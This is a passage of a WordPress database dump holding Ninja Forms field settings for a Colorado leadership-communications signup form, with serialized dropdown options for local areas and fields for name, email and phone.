Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}','options','a:3:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Colorado Springs\";s:5:\"value\";s:16:\"Colorado Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:41:\"Central Colorado - ECK Temple in Colorado\";s:5:\"value\";s:41:\"Central Colorado - ECK Temple in Colorado\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}'),(8715,187,'field_label','Text','field_label','Text'),(8716,187,'field_key','html_68','field_key','html_68'),(8717,187,'drawerDisabled','','drawerDisabled',''),(5283,184,'container_class','','container_class',''),(5284,184,'element_class','','element_class',''),(5285,184,'admin_label','','admin_label',''),(5286,184,'help_text','<p>Hold CTRL key for multiple selections<br></p>','help_text','<p>Hold CTRL key for multiple selections<br></p>'),(5287,184,'multi_size','4','multi_size','4'),(5288,184,'drawerDisabled','','drawerDisabled',''),(5289,184,'parent_id','17','parent_id','17'),(17043,599,'desc_text','','desc_text',''),(17042,599,'desc_pos','none','desc_pos','none'),(17629,637,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17628,637,'type','html','type','html'),(17626,637,'idAttribute','id','idAttribute','id'),(17627,637,'label','HTML','label','HTML'),(5302,186,'objectType','Field','objectType','Field'),(5303,186,'objectDomain','fields','objectDomain','fields'),(5304,186,'editActive','','editActive',''),(5305,186,'order','9','order','9'),(5306,186,'type','submit','type','submit'),(5307,186,'label','Submit','label','Submit'),(5308,186,'processing_label','Processing','processing_label','Processing'),(5309,186,'container_class','','container_class',''),(5310,186,'element_class','','element_class',''),(5311,186,'key','submit_1550094251707','key','submit_1550094251707'),(5312,186,'drawerDisabled','','drawerDisabled',''),(5313,186,'parent_id','17','parent_id','17'),(5314,187,'objectType','Field','objectType','Field'),(5315,187,'objectDomain','fields','objectDomain','fields'),(5316,187,'editActive','','editActive',''),(5317,187,'order','1','order','1'),(5318,187,'type','html','type','html'),(5319,187,'label','Text','label','Text'),(5320,187,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5321,187,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Colorado Leadership Communications</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Colorado Leadership Communications</span></span></span></strong></span></h3>'),(5322,187,'desc_el','div','desc_el','div'),(5323,187,'show_desc','0','show_desc','0'),(5324,187,'desc_pos','none','desc_pos','none'),(5325,187,'desc_text','','desc_text',''),(5326,187,'element_class','','element_class',''),(5327,187,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Mountain Area Leadership Communications</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Mountain Area Leadership Communications</span></span></span></strong></span></h3>'),(5328,187,'key','html_68','key','html_68'),(5329,187,'container_class','','container_class',''),(5330,187,'parent_id','18','parent_id','18'),(5331,188,'objectType','Field','objectType','Field'),(5332,188,'objectDomain','fields','objectDomain','fields'),(5333,188,'editActive','','editActive',''),(5334,188,'order','2','order','2'),(5335,188,'type','textbox','type','textbox'),(5336,188,'def_id','6','def_id','6'),(5337,188,'label','First Name','label','First Name'),(5338,188,'label_pos','above','label_pos','above'),(5339,188,'mask','','mask',''),(5340,188,'datepicker','0','datepicker','0'),(5341,188,'first_name','1','first_name','1'),(5342,188,'last_name','0','last_name','0'),(5343,188,'from_name','0','from_name','0'),(5344,188,'user_info_field_group','1','user_info_field_group','1'),(5345,188,'show_help','0','show_help','0'),(5346,188,'help_text','','help_text',''),(5347,188,'calc_auto_include','0','calc_auto_include','0'),(5348,188,'calc_option','0','calc_option','0'),(5349,188,'placeholder','','placeholder',''),(5350,188,'user_address_1','','user_address_1',''),(5351,188,'user_address_2','','user_address_2',''),(5352,188,'user_city','','user_city',''),(5353,188,'user_zip','','user_zip',''),(5354,188,'user_phone','','user_phone',''),(5355,188,'user_email','','user_email',''),(5356,188,'disable_input','0','disable_input','0'),(5357,188,'input_limit','','input_limit',''),(5358,188,'input_limit_type','char','input_limit_type','char'),(5359,188,'input_limit_msg','','input_limit_msg',''),(5360,188,'user_state','0','user_state','0'),(5361,188,'autocomplete_off','0','autocomplete_off','0'),(5362,188,'num_sort','0','num_sort','0'),(5363,188,'admin_label','','admin_label',''),(5364,188,'user_info_field_group_name','','user_info_field_group_name',''),(5365,188,'user_info_field_group_custom','','user_info_field_group_custom',''),(5366,188,'show_desc','0','show_desc','0'),(5367,188,'desc_pos','none','desc_pos','none'),(5368,188,'desc_text','','desc_text',''),(5369,188,'element_class','','element_class',''),(5370,188,'required','1','required','1'),(5371,188,'key','textbox_69','key','textbox_69'),(5372,188,'default','','default',''),(5373,188,'container_class','one-half first','container_class','one-half first'),(5374,188,'manual_key','','manual_key',''),(5375,188,'custom_mask','','custom_mask',''),(5376,188,'parent_id','18','parent_id','18'),(5377,189,'objectType','Field','objectType','Field'),(5378,189,'objectDomain','fields','objectDomain','fields'),(5379,189,'editActive','','editActive',''),(5380,189,'order','3','order','3'),(5381,189,'type','lastname','type','lastname'),(5382,189,'def_id','7','def_id','7'),(5383,189,'label','Last Name','label','Last Name'),(5384,189,'label_pos','above','label_pos','above'),(5385,189,'mask','','mask',''),(5386,189,'datepicker','0','datepicker','0'),(5387,189,'first_name','0','first_name','0'),(5388,189,'from_name','0','from_name','0'),(5389,189,'user_info_field_group','1','user_info_field_group','1'),(5390,189,'show_help','0','show_help','0'),(5391,189,'help_text','','help_text',''),(5392,189,'calc_auto_include','0','calc_auto_include','0'),(5393,189,'calc_option','0','calc_option','0'),(5394,189,'placeholder','','placeholder',''),(5395,189,'user_address_1','','user_address_1',''),(5396,189,'user_address_2','','user_address_2',''),(5397,189,'user_city','','user_city',''),(5398,189,'user_zip','','user_zip',''),(5399,189,'user_phone','','user_phone',''),(5400,189,'user_email','','user_email',''),(5401,189,'disable_input','0','disable_input','0'),(5402,189,'input_limit','','input_limit',''),(5403,189,'input_limit_type','char','input_limit_type','char'),(5404,189,'input_limit_msg','','input_limit_msg',''),(5405,189,'user_state','0','user_state','0'),(5406,189,'autocomplete_off','0','autocomplete_off','0'),(5407,189,'num_sort','0','num_sort','0'),(5408,189,'admin_label','','admin_label',''),(5409,189,'user_info_field_group_name','','user_info_field_group_name',''),(5410,189,'user_info_field_group_custom','','user_info_field_group_custom',''),(5411,189,'show_desc','0','show_desc','0'),(5412,189,'desc_pos','none','desc_pos','none'),(5413,189,'desc_text','','desc_text',''),(5414,189,'element_class','','element_class',''),(5415,189,'required','1','required','1'),(5416,189,'key','lastname_70','key','lastname_70'),(5417,189,'default','','default',''),(5418,189,'container_class','one-half','container_class','one-half'),(5419,189,'parent_id','18','parent_id','18'),(5420,190,'objectType','Field','objectType','Field'),(5421,190,'objectDomain','fields','objectDomain','fields'),(5422,190,'editActive','','editActive',''),(5423,190,'order','4','order','4'),(5424,190,'type','email','type','email'),(5425,190,'def_id','14','def_id','14'),(5426,190,'label','Email','label','Email'),(5427,190,'label_pos','above','label_pos','above'),(5428,190,'mask','','mask',''),(5429,190,'datepicker','0','datepicker','0'),(5430,190,'first_name','0','first_name','0'),(5431,190,'last_name','0','last_name','0'),(5432,190,'from_name','0','from_name','0'),(5433,190,'user_address_1','0','user_address_1','0'),(5434,190,'user_address_2','0','user_address_2','0'),(5435,190,'user_city','0','user_city','0'),(5436,190,'user_zip','0','user_zip','0'),(5437,190,'user_phone','0','user_phone','0'),(5438,190,'user_info_field_group','1','user_info_field_group','1'),(5439,190,'show_help','0','show_help','0'),(5440,190,'help_text','','help_text',''),(5441,190,'calc_auto_include','0','calc_auto_include','0'),(5442,190,'calc_option','0','calc_option','0'),(5443,190,'placeholder','','placeholder',''),(5444,190,'disable_input','0','disable_input','0'),(5445,190,'input_limit','','input_limit',''),(5446,190,'input_limit_type','char','input_limit_type','char'),(5447,190,'input_limit_msg','','input_limit_msg',''),(5448,190,'user_state','0','user_state','0'),(5449,190,'autocomplete_off','0','autocomplete_off','0'),(5450,190,'num_sort','0','num_sort','0'),(5451,190,'admin_label','','admin_label',''),(5452,190,'user_info_field_group_name','','user_info_field_group_name',''),(5453,190,'user_info_field_group_custom','','user_info_field_group_custom',''),(5454,190,'show_desc','0','show_desc','0'),(5455,190,'desc_pos','none','desc_pos','none'),(5456,190,'desc_text','','desc_text',''),(5457,190,'element_class','','element_class',''),(5458,190,'required','1','required','1'),(5459,190,'key','email_71','key','email_71'),(5460,190,'default','','default',''),(5461,190,'container_class','one-half first','container_class','one-half first'),(5462,190,'parent_id','18','parent_id','18'),(5463,191,'objectType','Field','objectType','Field'),(5464,191,'objectDomain','fields','objectDomain','fields'),(5465,191,'editActive','','editActive',''),(5466,191,'order','5','order','5'),(5467,191,'type','phone','type','phone'),(5468,191,'def_id','15','def_id','15'),(5469,191,'label','Phone','label','Phone'),(5470,191,'label_pos','above','label_pos','above'),(5471,191,'mask','(999) 999-9999','mask','(999) 999-9999'),(5472,191,'datepicker','0','datepicker','0'),(5473,191,'first_name','0','first_name','0'),(5474,191,'last_name','0','last_name','0'),(5475,191,'from_name','0','from_name','0'),(5476,191,'user_address_1','0','user_address_1','0'),(5477,191,'user_address_2','0','user_address_2','0'),(5478,191,'user_city','0','user_city','0'),(5479,191,'user_zip','0','user_zip','0'),(5480,191,'user_email','0','user_email','0'),(5481,191,'user_info_field_group','1','user_info_field_group','1'),(5482,191,'show_help','0','show_help','0'),(5483,191,'help_text','','help_text',''),(5484,191,'calc_auto_include','0','calc_auto_include','0'),(5485,191,'calc_option','0','calc_option','0'),(5486,191,'placeholder','','placeholder',''),(5487,191,'disable_input','0','disable_input','0'),(5488,191,'input_limit','','input_limit',''),(5489,191,'input_limit_type','char','input_limit_type','char'),(5490,191,'input_limit_msg','','input_limit_msg',''),(5491,191,'user_state','0','user_state','0'),(5492,191,'autocomplete_off','0','autocomplete_off','0'),(5493,191,'num_sort','0','num_sort','0'),(5494,191,'admin_label','','admin_label',''),(5495,191,'user_info_field_group_name','','user_info_field_group_name',''),(5496,191,'user_info_field_group_custom','','user_info_field_group_custom',''),(5497,191,'show_desc','0','show_desc','0'),(5498,191,'desc_pos','none','desc_pos','none'),(5499,191,'desc_text','','desc_text',''),(5500,191,'element_class','','element_class',''),(5501,191,'required','1','required','1'),(5502,191,'key','phone_72','key','phone_72'),(5503,191,'default','','default',''),(5504,191,'container_class','one-half','container_class','one-half'),(5505,191,'manual_key','','manual_key',''),(5506,191,'custom_mask','','custom_mask',''),(5507,191,'parent_id','18','parent_id','18'),(5508,192,'objectType','Field','objectType','Field'),(5509,192,'objectDomain','fields','objectDomain','fields'),(5510,192,'editActive','','editActive',''),(5511,192,'order','6','order','6'),(5512,192,'type','listselect','type','listselect'),(5513,192,'label','Your Local Area','label','Your Local Area'),(5514,192,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5515,192,'label_pos','above','label_pos','above'),(5516,192,'list_type','dropdown','list_type','dropdown'),(5517,192,'multi_size','5','multi_size','5'),(5518,192,'list_show_value','1','list_show_value','1'),(5519,192,'list','a:0:{}','list','a:0:{}'),(5520,192,'user_info_field_group','','user_info_field_group',''),(5521,192,'calc_auto_include','0','calc_auto_include','0'),(5522,192,'user_state','0','user_state','0'),(5523,192,'num_sort','0','num_sort','0'),(5524,192,'admin_label','','admin_label',''),(5525,192,'show_help','0','show_help','0'),(5526,192,'help_text','','help_text',''),(5527,192,'show_desc','0','show_desc','0'),(5528,192,'desc_pos','none','desc_pos','none'),(5529,192,'desc_text','','desc_text',''),(5530,192,'element_class','','element_class',''),(5531,192,'required','1','required','1'),(5532,192,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western 